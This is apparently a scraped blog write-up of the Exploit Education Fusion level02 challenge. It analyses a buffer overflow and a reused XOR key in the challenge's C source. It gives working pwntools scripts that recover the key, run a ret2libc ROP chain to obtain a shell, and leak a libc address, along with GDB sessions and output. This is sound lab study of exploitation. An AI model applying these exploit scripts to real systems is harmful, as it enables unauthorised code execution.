This level deals with some basic obfuscation \/ math stuff.<\/p>\n
This level introduces non-executable memory and return into libc \/ .text \/ return orientated programming (ROP).<\/p>\n
The description and source code can be found here: For this level, I looked at the source code and came up with a plan of attack before even launching the Fusion VM. Let’s step through it. I won’t bother with I’m not sure why those comments at the start of the function are there, they don’t seem to be very relevant. Anyway, a few things are happening:<\/p>\n You may have noticed the vulnerability here. The user can specify the maximum size of the input. Even though there’s 131,072 bytes (32 * 4096) allocated to the “buffer” variable, it doesn’t matter as the user can simply specify a higher number.<\/p>\n The While there is the obvious buffer overflow vulnerability, the problem is that whatever data you send will be XOR’ed with a random key. After looking at the source code for a while, I did spot one more mistake. If the The next step is to figure out how the program was intended to be used. This was a bit harder than I expected and couldn’t get it to work by simply using netcat and manually entering the expected input. One reason for this is that the “sz” (size) variable it’s expecting is a 4-byte integer. If I supplied “58” as input, it looks at that as “\\x38\\x35” (little-endian). What I need to send it, is “\\x3a\\x00\\x00\\x00”. That, coupled with figuring out where it wanted a newline character, made this a tedious task of trial-and-error. I suppose it wouldn’t have taken so long if I understood the C language a bit better, but such is life. Anyway, here’s a script I came up with to interact with the program in it’s intended fashion:<\/p>\n Now that I’ve got that working, I’ll start building out the attack. I’ll use a “ret2libc” technique to bypass both ASLR and NX protections.<\/p>\n I like to build my exploits (or any script I write) and test them incrementally so that if something goes wrong, I’ll have a better idea of what the problem was. First, I’ll write the exploit pretending that ASLR is not enabled. I plan to create a ROP chain that calls Getting the address of I also grabbed the address of Here’s the “cheat” exploit:<\/p>\n At this point, I shouldn’t have to explain how to find the offset of the saved return address (the 131088 number). You can see that I have the 3 addresses in my ROP chain. The address for Testing it out:<\/p>\n The next step is to figure out how to get base address of libc. I used this blog post by @D4mianWayne<\/a> to get a better understanding of ret2libc attacks and leaking the libc address: That post explains, exactly, what I’ll need to do for this challenge with the only difference being the architecture. That post uses an x64 binary so function arguments are passed in registers instead of the stack.<\/p>\n The idea here is to overwrite the saved return address on the stack with the address of First, I’ll get the PLT and GOT addresses for This shows that the PLT address is 0x8048930 and GOT address is 0x804b3b8.<\/p>\n Now I’ll need to find the While I’m here, I’m going to get the actual To get the offset of Now I need to modify my Python script to capture the address:<\/p>\n Let’s run it:<\/p>\n That leaked address (0xb76583b0) is the same as the one I got from GDB on the Fusion VM.<\/p>\n
\nhttp:\/\/exploit.education\/fusion\/level02\/<\/a><\/p>\nSource Code Analysis<\/h1>\n
main()<\/code> as it’s only relevant purpose is to call the encrypt_file()<\/code> function. That function may look kinda long, but it’s actually pretty simple.<\/p>\nvoid encrypt_file() {\r\n \/\/ http:\/\/thedailywtf.com\/Articles\/Extensible-XML.aspx\r\n \/\/ maybe make bigger for inevitable xml-in-xml-in-xml ?\r\n unsigned char buffer[32 * 4096];\r\n\r\n unsigned char op;\r\n size_t sz;\r\n int loop;\r\n\r\n printf("[-- Enterprise configuration file encryption service --]\\n");\r\n \r\n loop = 1;\r\n while(loop) {\r\n nread(0, &op, sizeof(op));\r\n switch(op) {\r\n case 'E':\r\n nread(0, &sz, sizeof(sz));\r\n nread(0, buffer, sz);\r\n cipher(buffer, sz);\r\n printf("[-- encryption complete. please mention "\r\n "474bd3ad-c65b-47ab-b041-602047ab8792 to support "\r\n "staff to retrieve your file --]\\n");\r\n nwrite(1, &sz, sizeof(sz));\r\n nwrite(1, buffer, sz);\r\n break;\r\n case 'Q':\r\n loop = 0;\r\n break;\r\n default:\r\n exit(EXIT_FAILURE);\r\n }\r\n }\r\n}<\/pre>\n\n
\n
cipher()<\/code> function.\ncipher()<\/code> function is a bit more complex, even though it’s not a proper encryption algorithm.<\/p>\nvoid cipher(unsigned char *blah, size_t len) {\r\n static int keyed;\r\n static unsigned int keybuf[XORSZ];\r\n\r\n int blocks;\r\n unsigned int *blahi, j;\r\n\r\n if(keyed == 0) {\r\n int fd;\r\n fd = open("\/dev\/urandom", O_RDONLY);\r\n if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf))\r\n exit(EXIT_FAILURE);\r\n close(fd);\r\n keyed = 1;\r\n }\r\n\r\n blahi = (unsigned int *)(blah);\r\n blocks = (len \/ 4);\r\n if(len & 3) blocks += 1;\r\n\r\n for(j = 0; j < blocks; j++) {\r\n blahi[j] ^= keybuf[j % XORSZ];\r\n }\r\n}<\/pre>\n\n
\n
sizeof(keybuf)<\/code>) from “\/dev\/urandom” into the “keybuf” variable<\/li>\n\n
cipher()<\/code> function is called multiple time, the “keybuf” variable will be the same each time. The “keyed” variable is declared but not initialized and it should occupy the same memory address each time. So, I should be able to send data, take the encrypted form, XOR the two together and get the key. Then, I can overwrite the saved EIP value with an “encrypted” address so that when the encryption happens on it, the desired “unencrypted” address will be left.<\/p>\nInteracting With The Program<\/h1>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\nio = remote("fusion", 20002)\r\n\r\ndata = "Lorem ipsum dolor sit amet, consectetur adipiscing elit."\r\nprint(io.recvline().decode())\r\nio.send("E")\r\nio.send((len(data)).to_bytes(4, "little"))\r\nio.send(data)\r\n\r\nprint(io.recvline().decode())\r\nsize = int.from_bytes(io.recv(4), 'little')\r\nencrypted = b""\r\nwhile len(encrypted) < size:\r\n encrypted += io.recv(size)\r\n\r\nlog.info(f"Size = {size}")\r\nlog.info("Encrypted message:")\r\nprint(encrypted)\r\nprint()\r\nio.close()\r\n<\/pre>\n\r\nandrew ~\/fusion\/level02 $ .\/level02_test.py \r\n[+] Opening connection to fusion on port 20002: Done\r\n[-- Enterprise configuration file encryption service --]\r\n\r\n[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]\r\n\r\n[*] Size = 56\r\n[*] Encrypted message:\r\nb"\\x8b\\xc7\\x86\\xfe.\\x17\\xb0\\xd1\\x04\\xdb&\\x10%n\\xa6Bg_`\\xce\\xa7\\x14\\x9c \\xce\\x82\\x93\\x14\\xef\\xc7.M\\xa3\\xd7{d'\\xef\\xb7\\xa2\\x0e\\xce\\xa3\\xb5\\x90\\xd4\\xf5.j\\x15[\\x9d\\nH\\x18z"\r\n\r\n[*] Closed connection to fusion port 20002\r\n<\/pre>\nCheating<\/h1>\n
system()<\/code> with a “\/bin\/sh” string passed to it. Normally, with ASLR enabled, the address of system()<\/code> would be randomized (along with everything else in libc) and you’d have no way of knowing it when attacking a remote machine. In this case, I know that the parent process for “level02” is not restarted each time a connection is made & closed. This means that I can attach to the process with GDB, print the address of system()<\/code>, and use that in my ROP chain knowing that it won’t change (until I restart the VM or the parent process).<\/p>\nsystem()<\/code>:<\/p>\n\r\nfusion@fusion ~ $ ps aux | grep level02\r\n20002 1201 0.0 0.0 1816 52 ? Ss 05:44 0:00 \/opt\/fusion\/bin\/level02\r\nfusion 1463 0.0 0.0 4184 796 pts\/0 S+ 05:45 0:00 grep --color=auto level02\r\n\r\nfusion@fusion ~ $ sudo gdb -q -p 1201\r\n[sudo] password for fusion:\r\nwarning: not using untrusted file "\/home\/fusion\/.gdbinit"\r\nAttaching to process 1201\r\nReading symbols from \/opt\/fusion\/bin\/level02...done.\r\nReading symbols from \/lib\/i386-linux-gnu\/libc.so.6...Reading symbols from \/usr\/lib\/debug\/lib\/i386-linux-gnu\/libc-2.13.so...done.\r\ndone.\r\nLoaded symbols for \/lib\/i386-linux-gnu\/libc.so.6\r\nReading symbols from \/lib\/ld-linux.so.2...(no debugging symbols found)...done.\r\nLoaded symbols for \/lib\/ld-linux.so.2\r\n0xb77cb424 in __kernel_vsyscall ()\r\n\r\n(gdb) p system\r\n$1 = {<text variable, no debug info>} 0xb767fb20 <__libc_system>\r\n\r\n(gdb) p exit\r\n$2 = {<text variable, no debug info>} 0xb76759e0 <__GI_exit>\r\n\r\n(gdb) find 0xb767fb20, +9999999, "\/bin\/sh"\r\n0xb777b8da\r\nwarning: Unable to access target memory at 0xb77bdf62, halting search.\r\n1 pattern found.\r\n<\/pre>\nexit()<\/code> so the program will cleanly exit when I close the shell. It’s not necessary here, but why not create good habits? I also did a search for a “\/bin\/sh” string starting at the address of system()<\/code>. This will also be randomized but I can just hard-code it into my script for now.<\/p>\n\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\n\r\ndef encrypt(data):\r\n io.send("E")\r\n io.send((len(data)).to_bytes(4, "little"))\r\n io.send(data)\r\n\r\n print(io.recvline().decode())\r\n size = int.from_bytes(io.recv(4), 'little')\r\n encrypted = b""\r\n while len(encrypted) < size:\r\n encrypted += io.recv(size)\r\n\r\n return encrypted\r\n\r\n\r\nio = remote("fusion", 20002)\r\nprint(io.recvline().decode())\r\n\r\ndata = "A" * 128\r\nencrypted = encrypt(data)\r\nkey = bytes(a ^ b for a, b in zip(data.encode(), encrypted))\r\n\r\npayload = b"A" * 131088\r\npayload += p32(0xb767fb20) # Address of system()\r\npayload += p32(0xb76759e0) # Address of exit()\r\npayload += p32(0xb777b8da) # Address of "\/bin\/sh"\r\n\r\nenc_data = b""\r\nfor i in range(0, len(payload), len(key)):\r\n enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))\r\n\r\nencrypt(enc_data)\r\n\r\nio.send("Q")\r\nio.interactive()\r\n<\/pre>\nexit()<\/code> comes after system()<\/code> so that when system()<\/code> hits ret<\/code>, it’ll pop the address for exit()<\/code> into EIP and cleanly exit the program. The address for the “\/bin\/sh” string is last because system()<\/code> will look to ESP+4 for an argument.<\/p>\n\r\nandrew ~\/fusion\/level02 $ .\/level02_system.py \r\n[+] Opening connection to fusion on port 20002: Done\r\n[-- Enterprise configuration file encryption service --]\r\n\r\n[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]\r\n\r\n[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]\r\n\r\n[*] Switching to interactive mode\r\n$ id\r\nuid=20002 gid=20002 groups=20002\r\n<\/pre>\n
Leaking Libc Address<\/h1>\n
\nhttps:\/\/d4mianwayne.github.io\/posts\/ret2libc-pwntools<\/a><\/p>\nputs@plt<\/code> while passing a single argument to that “call,” the address of puts@got<\/code>. After you send that payload, you’ll receive some unpacked addresses, the first of which should be the address of puts()<\/code>. You can use that to calculate the base address of libc. Looking at the symbols in libc, you can find the offset to puts()<\/code> and subtract that from the actual address that was leaked. This gives you libc’s base address, from which you can calculate the actual address of any other function. Just find the offset and add that to the base address.<\/p>\nputs()<\/code> in the level02 binary:<\/p>\n\r\nfusion@fusion ~ $ objdump -d \/opt\/fusion\/bin\/level02 | grep -A1 puts\r\n08048930 <puts@plt>:\r\n 8048930: ff 25 b8 b3 04 08 jmp *0x804b3b8\r\n...\r\n<\/pre>\n
puts()<\/code> offset within libc. To determine which libc binary is being used by this process, I can attach to it with GDB again:<\/p>\n\r\nfusion@fusion ~ $ sudo gdb -q -p 1201\r\n[sudo] password for fusion: \r\nwarning: not using untrusted file "\/home\/fusion\/.gdbinit"\r\nAttaching to process 1201\r\nReading symbols from \/opt\/fusion\/bin\/level02...done.\r\nReading symbols from \/lib\/i386-linux-gnu\/libc.so.6...Reading symbols from \/usr\/lib\/debug\/lib\/i386-linux-gnu\/libc-2.13.so...done.\r\ndone.\r\nLoaded symbols for \/lib\/i386-linux-gnu\/libc.so.6\r\nReading symbols from \/lib\/ld-linux.so.2...(no debugging symbols found)...done.\r\nLoaded symbols for \/lib\/ld-linux.so.2\r\n0xb77cb424 in __kernel_vsyscall ()\r\n\r\n(gdb) info sharedlibrary \r\nFrom To Syms Read Shared Object Library\r\n0xb7659be0 0xb7766784 Yes \/lib\/i386-linux-gnu\/libc.so.6\r\n0xb77cc830 0xb77e35cf Yes (*) \/lib\/ld-linux.so.2\r\n(*): Shared library is missing debugging information.\r\n<\/pre>\n
puts()<\/code> address so I can verify my results later on:<\/p>\n\r\n(gdb) p puts\r\n$1 = {<text variable, no debug info>} 0xb76a33b0 <_IO_puts>\r\n<\/pre>\nputs()<\/code>, I can use readelf<\/code> to list the symbols in libc and grep for “puts”:<\/p>\n\r\nfusion@fusion ~ $ readelf -s \/lib\/i386-linux-gnu\/libc.so.6 | grep " puts@"\r\n 423: 000603b0 444 FUNC WEAK DEFAULT 12 puts@@GLIBC_2.0\r\n<\/pre>\n
\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\nio = remote("fusion", 20002)\r\n\r\ndef encrypt(data):\r\n io.send("E")\r\n io.send((len(data)).to_bytes(4, "little"))\r\n io.send(data)\r\n\r\n print(io.recvline().decode())\r\n size = int.from_bytes(io.recv(4), 'little')\r\n encrypted = b""\r\n while len(encrypted) < size:\r\n encrypted += io.recv(size)\r\n\r\n return encrypted\r\n\r\n\r\nprint(io.recvline().decode())\r\n\r\ndata = "A" * 128\r\nencrypted = encrypt(data)\r\n\r\nsample = data[:128].encode()\r\nkey = bytes(a ^ b for a, b in zip(sample, encrypted))\r\n\r\npayload = b"A" * 131088\r\npayload += p32(0x08048930) # Address of puts@plt\r\npayload += b"AAAA"\r\npayload += p32(0x0804b3b8) # Address of puts@got\r\n\r\nenc_data = b""\r\nfor i in range(0, len(payload), len(key)):\r\n enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))\r\n\r\nencrypt(enc_data)\r\n\r\nio.send("Q")\r\nputs_offset = 0x603b0\r\nleak = u32(io.recv(4))\r\nlibc_base = leak - puts_offset\r\nlog.info(f"Leaked puts() address: {hex(leak)}")\r\nlog.info(f"Libc puts() offset: {hex(puts_offset)}")\r\nlog.info(f"Libc base address: {hex(libc_base)}")\r\nprint()\r\nio.close()\r\n<\/pre>\n\r\nandrew ~\/fusion\/level02 $ .\/level02_puts.py \r\n[+] Opening connection to fusion on port 20002: Done\r\n[-- Enterprise configuration file encryption service --]\r\n\r\n[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]\r\n\r\n[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]\r\n\r\n[*] Leaked puts() address: 0xb76583b0\r\n[*] Libc puts() offset: 0x603b0\r\n[*] Libc base address: 0xb75f8000\r\n\r\n[*] Closed connection to fusion port 20002\r\n<\/pre>\n
Side Note<\/h3>\n